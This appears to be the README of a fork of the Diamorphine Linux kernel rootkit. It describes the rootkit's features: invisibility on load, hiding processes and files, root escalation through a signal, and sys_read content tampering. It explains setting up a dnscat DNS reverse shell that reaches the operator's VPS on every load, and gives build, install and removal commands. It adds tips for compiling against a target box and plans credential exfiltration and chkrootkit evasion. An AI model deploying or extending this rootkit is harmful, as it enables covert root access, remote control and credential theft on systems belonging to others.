Diamorphine is a LKM rootkit for Linux Kernels 2.6.x/3.x/4.x/5.x and ARM64.
This fork is just me trying to implement new features in m0nad's awesome rk.
-
When loaded, the module starts invisible;
-
Hide/unhide any process by sending a signal 31;
-
Sending a signal 63(to any pid) makes the module become (in)visible;
-
Sending a signal 64(to any pid) makes the given user become root;
-
Files or directories starting with the MAGIC_PREFIX become invisible;
-
File content tampering by hooking sys_read (I basically just copied this feature from f0rb1dd3n reptile with a few changes to make it work here. Don't expect much uheauh.
-
Spawn a DNSCAT session when the module is loaded and automatically hide it's process.
1 - Test the sys_read hook compatibility across different kernels
2 - Implement boot persistence (otherwise the dnscat feature doesn't make any sense hueahue)
3 - Implement a way of hiding UDP/TCP connections
4 - Something pretty freaking cool would be hooking the SSHD auth_password function and exfiltrating the credentials via DNS, again, I don't even know if this is possible to do using LKM, but I'll try.
5 - Chkrootkit bypass
For file content tampering, modify diamorphine.h HIDETAGIN
and HIDETAGOUT
, all content inside those tags (including the tags itself) will be hidden.
#define HIDETAGIN "<viajano>"
#define HIDETAGOUT "</viajano>"
To enable the dnscat feature set DNSCATSHELL
to 1 in diamorphine.h
and define a valid domain (this is, with glue records pointing to your VPS ip address), run the
dnscat server and everytime you load the module you will receive a shell. Also, you need to place the dnscat client binary inside the RK_PATH
, otherwise it won't work.
Verify if the kernel is 2.6.x/3.x/4.x/5.x
uname -r
Clone the repository
git clone https://github.com/m0nad/Diamorphine
Enter the folder
cd Diamorphine
Compile
make
Load the module(as root)
insmod diamorphine.ko
The module starts invisible, to remove you need to make it visible
kill -63 0
Then remove the module(as root)
rmmod diamorphine
A lot of times the kernel headers will be missing, tips:
1 - /lib/modules/$(uname -r)/build is just a symlink to /usr/src/linux-headers-$(uname -r), sometimes the symlink is pointing to a path that no longer exists but the kernel headers are installed in /usr/src
2 - If the kernel headers are really missing or incompatible, you need to install them, apt-get install linux-headers-$(uname -r) will fail 99% of the time, try installing other versions of the package. Also, the repository list of the target could be fucked up.
3 - If nothing works, download locally the same version of the kernel that the box is using, compile it, install the headers, compile diamorphine and upload the LKM files into the target.
4 - If you're crazy or just have nothing to lose, you can try live kernel patching.
f0rb1dd3n RK https://github.com/f0rb1dd3n/Reptile/
Ritsec Linux Syscall Hooking introduction https://ritcsec.wordpress.com/2020/11/22/linux-syscall-hooking/
Wikipedia Rootkit https://en.wikipedia.org/wiki/Rootkit
Linux Device Drivers http://lwn.net/Kernel/LDD3/
LKM HACKING https://web.archive.org/web/20140701183221/https://www.thc.org/papers/LKM_HACKING.html
Memset's blog http://memset.wordpress.com/
Linux on-the-fly kernel patching without LKM http://phrack.org/issues/58/7.html
WRITING A SIMPLE ROOTKIT FOR LINUX https://web.archive.org/web/20160620231623/http://big-daddy.fr/repository/Documentation/Hacking/Security/Malware/Rootkits/writing-rootkit.txt
Linux Cross Reference http://lxr.free-electrons.com/
zizzu0 LinuxKernelModules https://github.com/zizzu0/LinuxKernelModules/
Linux Rootkits: New Methods for Kernel 5.7 https://xcellerator.github.io/posts/linux_rootkits_11/